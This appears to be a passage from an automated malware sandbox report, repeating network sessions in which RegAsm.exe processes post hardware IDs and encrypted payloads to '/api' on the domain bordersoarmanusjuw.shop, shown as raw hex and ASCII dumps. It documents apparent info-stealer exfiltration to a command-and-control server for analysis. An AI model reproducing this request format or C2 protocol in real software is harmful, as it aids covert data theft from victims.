                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOz4dT9azjDJ1XZwzXnzmVD%2Fv1MLm3r1fXZ5%2BVEq3NMNYEbbGK0KUts%2BCtlhwm2iD8%2FAeiGpNf15%2F9hSniTBvgf4kIkS32htPJ%2FEJwwOEnQTRF6FzpPv5zBMXaPMKa4Kw88ABmi61djGcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbee4b5169ef-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.449750172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:23 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18158
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:23 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:23 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                                                                                            Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                                                            2024-04-21 13:31:23 UTC810INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:23 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=0gnf2uc5o4lfefgshq1iomsiij; expires=Thu, 15-Aug-2024 07:18:02 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4kLRo78KfOjzog6%2B6MqaABZ8Ugs8bYvChgBvn2MHqeEFPVd1tEHlz9O51OVLzoZA8sYU8CqpYeD9gfJ1royCmVfaEanOYJBvNnm%2B0qK0ynBkxgRfHyg66W1xK2riVhLM4qnTfo6XMoZTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbeeac6d135d-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.449751172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:23 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:23 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:23 UTC810INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:23 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ubl6u7em0dqj597ci55n3ggqcf; expires=Thu, 15-Aug-2024 07:18:02 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Jw9Kpq9dhL74tf9KmKb%2F3x9OHj7joW5wmLmUoBDuDrhTDt5aIISMGlf3YK37s6hPLbtfMe6cYpHpIrPVoU%2FKsmOlzx2egzOIboVz21XyOF3ENH7T4xmtrMrrDvkaTA0hxOPHFebz0X0Hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbef0e454569-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.449752172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:24 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:24 UTC812INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:24 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=od7d0mbfh5paprd78ctqq6rtbs; expires=Thu, 15-Aug-2024 07:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G7VqHIiMTsd2w6zDEHLp3m3jVRV7MBX43hpExD82feKhDJdvLj8r93yA3okSAWsFr%2B3R0%2FNVoZfQAeILgjUYAjF3F68mT70i8zC7UkQSbtoWJRNAlWrwWKcmxNP4PevS3sNLrWAVZR4%2BWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf37fd9674c-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.449753172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:24 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:24 UTC812INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:24 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=6fmf8sbvg7auv2gq73998cii67; expires=Thu, 15-Aug-2024 07:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TCyfvn7sK0KBdhHzPlElq1yprM8NexhRLoyFbrEzhoNNd6Ezz3GaqqyG1F%2F5BKlLFq6fowPqT1g4TA97fIhf479xehPIYunJmy4aX6hmay%2F5AUsyjwqsZKO%2FxAzyNOP7yTbetVmor8K0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf37c3a185f-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.449754172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:24 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:24 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                            2024-04-21 13:31:24 UTC816INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:24 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=bfnoiedas2u5brlotc1iamrpfl; expires=Thu, 15-Aug-2024 07:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWxBESaRieKWv7%2BG4DW559yy8M1sulCqWXEFroAYrt1QH2d0JhTgyUsSrYCN6jow07FtXy7KsnFpfWJVCqUk8tv%2BNJV3hsbubyfQJ7yuXDxjaeDjw16CS%2F9sdaBhnm%2BX1j6Y9%2BzdtIFwNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf3ff021d80-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.449755172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:24 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:24 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                            2024-04-21 13:31:25 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:25 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=3eknab3mo9v6m5qq1kglariq8s; expires=Thu, 15-Aug-2024 07:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bCUwvDWs6qjlM%2BgPNR8g2lh%2FzDjg4aLMNuDPtVp5cimaMtfJwUE70%2FKgyebYaPdfMfVrInc8NOK8w5SToY1wr0fjCEElQ8qyJrQ5YCOG%2FLLkUBYTlA9QEe1EKZqW%2BCjm45BTpgx0me%2Bl7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf8c80aad62-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.449756172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:24 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
